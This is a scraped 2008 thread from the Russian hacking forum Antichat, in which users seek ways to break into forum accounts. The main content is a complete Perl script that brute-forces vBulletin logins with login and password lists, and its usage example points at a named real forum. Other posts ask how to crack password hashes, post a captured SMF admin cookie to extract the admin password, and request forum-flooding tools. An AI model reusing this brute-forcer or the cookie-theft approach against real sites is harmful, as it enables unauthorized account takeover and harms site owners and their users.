Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
25.09.2008, 17:00
|
|
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479
Репутация:
1809
|
|
Господа! Чем подбирать пароль к аку vBulletin 3.0.x ?
|
|
|
28.09.2008, 15:09
|
|
Новичок
Регистрация: 30.06.2008
Сообщений: 16
Провел на форуме:
57497
Репутация:
8
|
|
такой вопрос что за хеш если это ваще хеш fsH1sRBI6rLuQ! не могли бы помочь рассшифровать!
|
|
|
|
04.10.2008, 16:20
|
|
Banned
Регистрация: 10.04.2008
Сообщений: 618
Провел на форуме:
2603997
Репутация:
942
|
|
Брут на перле
Код:
#!/usr/bin/perl
#################################################
# vBulletin 3 (rus) brute
# -------------
#
# copyright : (C) Cyber Lords, 2002-2007
# http://www.cyberlords.net
#
# Coded by VeX [614883]
#################################################
### modules ###
use LWP::UserAgent;
use HTTP::Cookies;
use Getopt::Std;
### main ###
usage() if ($ARGV[0] eq "-h" || $ARGV[0] eq "-help");
print "\n\n~~~ vBulletin 3 (rus) brute by VeX 1.0.3 ~~~\n\n";
getopt("lpuht");
$logins = $opt_l || 'logins.txt';
$pass = $opt_p || 'pass.txt';
$host = $opt_u;
$logs = $opt_h || 'logs.txt';
$threads = $opt_t || 50;
open(P, $pass) or die "\n[-] Don't open ".$pass." file\n";
while(<P>) { push(@pass, $_); }
close(P);
open(L, $logins) or die "\n[-] Don't open ".$logins." file\n";
while(<L>) { push(@logins, $_); }
close(L);
print "[+] Loading ".scalar(@logins)." logins\n"; logs("[+] Loading ".scalar(@logins)." logins\n");
print "[+] Loading ".scalar(@pass)." passwords\n"; logs("[+] Loading ".scalar(@pass)." passwords\n\n");
foreach $login (@logins)
{
chomp($login);
foreach $pass (@pass)
{
chomp($pass);
push (@info, "$login---$pass");
}
}
#for(@info){ print "$_\n"; }
while(1) {
for ($i=0;$i<=$threads;$i++) {
unless($info[$counter]) {
killpidz();
exit;
}
if ($pid=fork()) {
push(@forked,$pid);
}
else {
($user, $pass) = split /---/, $info[$counter];
chomp($user); chomp($pass);
if(brute($user, $pass))
{
print "\n\n[+] Find [$user:$pass]";
logs("\n\n[+] Find [$user:$pass]");
$counter = scalar(@info)+1;
exit(1);
}
exit;
}
$counter++;
}
killpidz();
}
sub brute {
my($user, $pass) = @_;
$data = "vb_login_username=$user&cookieuser=1&vb_login_password=$pass&s=&do=login&vb_login_md5password=&vb_login_md5password_utf=";
$cookie_jar = new HTTP::Cookies();
$opera = new LWP::UserAgent;
$opera->agent('Opera/9.0 (Windows NT 5.1; U; en; (R1 1.5))');
$opera->timeout(30);
$h = new HTTP::Headers
Accept => 'application/vnd.ms-excel, application/msword, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-comet, */*',
User_Agent => 'Opera/9.0 (Windows NT 5.1; U; en; (R1 1.5))',
Referer => 'http://google.com/';
$request = new HTTP::Request('GET', $host, $h);
$response = $opera -> request($request);
$content = $response -> content;
$cookie_jar->extract_cookies($response);
open(C, ">login_1.html"); print C $content; close(C);
$h = new HTTP::Headers
Accept => 'application/vnd.ms-excel, application/msword, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-comet, */*',
User_Agent => 'Opera/9.0 (Windows NT 5.1; U; en; (R1 1.5))',
Referer => $host;
$request = new HTTP::Request('POST', $host."login.php?do=login", $h);
$cookie_jar -> add_cookie_header($request);
$request->content_type('application/x-www-form-urlencoded');
$request->content('type=another');
$request->content($data);
$response = $opera -> request($request);
$content = $response -> content;
$cookie_jar->extract_cookies($response);
open(C, ">login_2.html"); print C $content; close(C);
if($content=~m/Спасибо за вход/){ print "[+] $user:$pass ... ok\n"; return 1; }
else{ print "[-] $user:$pass ... error\n"; return 0; }
}
sub logs {
$text = shift;
open(L, ">>".$logs); print L $text; close(L);
}
sub usage {
print "\nUsage: $0 [options]...\n\n";
print "Options are:
-u: Forum url
-l: Login's file [Default: login.txt]
-p: Password's file [Default: pass.txt]
-h: Log's file [Default: logs.txt]
-t: Threads [Degault: 50]
-h: This help
Exemple:
perl brute.pl -u \"http://www.raginfo.ru/forum/\" -l users.txt -p big_pass.txt -h logi.txt -t 25\n";
exit(1);
}
sub killpidz {
foreach (@forked) {
chomp;
waitpid($_,0);
kill("TERM" => $_)
}
undef @forked;
}
exit(1);
|
|
|
|
28.10.2008, 12:16
|
|
Новичок
Регистрация: 28.10.2008
Сообщений: 1
Провел на форуме:
4501
Репутация:
0
|
|
баг с session
нашел в логах следующее
String found where operator expected at (eval 15) line 1, near ")",""
\t(Missing operator before ","?) Bareword found where operator expected at (eval 15) line 1, near "","_SESSION_EXPIRE_LIST"
\t(Missing operator before _SESSION_EXPIRE_LIST?)
String found where operator expected at (eval 15) line 1, near "_SESSION_EXPIRE_LIST" => {""
Unquoted string "logged" may clash with future reserved word at (eval 15) line 1.
String found where operator expected at (eval 15) line 1, near "in" => 2400},""
Bareword found where operator expected at (eval 15) line 1, near "" => 2400},"reg_from"
\t(Missing operator before reg_from?)
String found where operator expected at (eval 15) line 1, near "reg_from" => ""
Bareword found where operator expected at (eval 15) line 1, near "" => "http"
\t(Missing operator before http?)
Unquoted string "http" may clash with future reserved word at (eval 15) line 1.
Bareword found where operator expected at (eval 15) line 1, near "//meet"
\t(Missing operator before eet?)
Unquoted string "eet" may clash with future reserved word at (eval 15) line 1.
Unquoted string "sotchi" may clash with future reserved word at (eval 15) line 1.
Unquoted string "ru" may clash with future reserved word at (eval 15) line 1.
Unquoted string "fcgi" may clash with future reserved word at (eval 15) line 1.
Unquoted string "fpl" may clash with future reserved word at (eval 15) line 1.
Unquoted string "sid" may clash with future reserved word at (eval 15) line 1.
Bareword found where operator expected at (eval 15) line 1, near "9a41fb838f1db13b9a43be32ac07e07e"
\t(Missing operator before a41fb838f1db13b9a43be32ac07e07e?)
String found where operator expected at (eval 15) line 1, at end of line
Can't find string terminator '"' anywhere before EOF at (eval 15) line 1.
Can't find string terminator '"' anywhere before EOF at (eval 15) line 1.
Can't find string terminator '"' anywhere before EOF at (eval 15) line 1.
Use of uninitialized value in sprintf at /usr/local/lib/perl5/site_perl/5.8.8/CGI/Session/File.pm line 93.
incomplete headers (0 bytes) received from server "/usr/local/www/meet.sotchi.ru/fcgi-bin/__start.fpl"
и соответсвенно в файле сессии (юзаю CGI::Session::File), вижу следующее (переводы строк добавил для формата):
$D = {
"password_value" => 148,
"bd2" => 12,
"bd1" => 23,
"myid" => 62,
"password" => 148,
"res_save" => "",
"reg_count" => 0,
"code" => "81o4d9yrjswtgxq9nfl66wei3j46tok6",
"_SESSION_ID" => "9a41fb838f1db13b9a43be32ac07e07e",
"_SESSION_ETIME" => 2400,
"reg_error_descr" => "",
"ccode" => "0519",
"location" => 1,
"~logged-in" => 1,
"_SESSION_REMOTE_ADDR" => "62.xxx...",
"_SESSION_CTIME" => "1225126077",
"login" => "Dandy",
"_SESSION_ATIME" => "1225127741",
"bd3" => 1982,
"reg_error" => "",
"login_value" => "abc \x{422}\x{441}\x{441}.. )",
"_SESSION_EXPIRE_LIST" => {"~logged-in" => 2400},
"reg_from" => "blah blah ?sid=9a41fb838f1db13b9a43be32ac07e07e"
};
{441}.. )",
"_SESSION_EXPIRE_LIST" => {"~logged-in" => 2400},
};
Я так понимаю тут уязвимость с Unicode или что то еще... есть мысли?
|
|
|
|
29.10.2008, 19:07
|
|
Новичок
Регистрация: 28.10.2008
Сообщений: 4
Провел на форуме:
9016
Репутация:
0
|
|
Можно ли вытащить из куков пароль админа а то на сайт по логином админа подставив куки зайти могу в админку нет((
вот куки:
SMFCookie692=a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B i%3A1%3Bs%3A40%3A%22bb70ecc84a7a7d197e7017d250e60a 3be8309ea0%22%3Bi%3A2%3Bi%3A1414066970%3Bi%3A3%3Bi %3A0%3B%7D;%20PHPSESSID=89e357839c94fb76eeb52c6ab8 c404d7
|
|
|
|
01.11.2008, 16:56
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
Блин ребята я уже замучился =)
Вобщем нужна версия http://www.myrpg.ru/forum движек IPB и еще =) Может кто подскажет куда там делся файл http://www.myrpg.ru/forum/admin.php и уж если совем не лень то пожалуйста где там лежат .js
PS: Не я не полный нюб но все же =)
|
|
|
|
05.11.2008, 18:58
|
|
Новичок
Регистрация: 29.10.2008
Сообщений: 2
Провел на форуме:
4185
Репутация:
0
|
|
Хай, У меня вопрос скачал antiturk v 1.0 (Флудилка по форума )
На на форумах mybb . ru почему-то не пашит пробывал но нечего не получилось,смотрел видео как это делать....
Пишит ошибку a key with the name ----------------------------------------- потом цифры и all ready used .... внизу скрин
http://i033.radikal.ru/0811/70/e84892083a1c.png
И если вам не тяжело можете выложить тему где все всё всё есть для накрутки мубб.ру итг.......
|
|
|
|
06.11.2008, 02:14
|
|
Новичок
Регистрация: 29.10.2008
Сообщений: 2
Провел на форуме:
4185
Репутация:
0
|
|
Я получу ответ на свой вопрос или нет?
|
|
|
|
07.11.2008, 00:13
|
|
Участник форума
Регистрация: 08.11.2006
Сообщений: 208
Провел на форуме:
1038169
Репутация:
184
|
|
Demonboy возможно это хеш пасса?
bb70ecc84a7a7d197e7017d250e60a 3be8309ea0
|
|
|
|
10.11.2008, 10:44
|
|
Новичок
Регистрация: 07.04.2005
Сообщений: 20
Провел на форуме:
43505
Репутация:
0
|
|
Последний раз редактировалось GaD; 10.11.2008 в 10:46..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
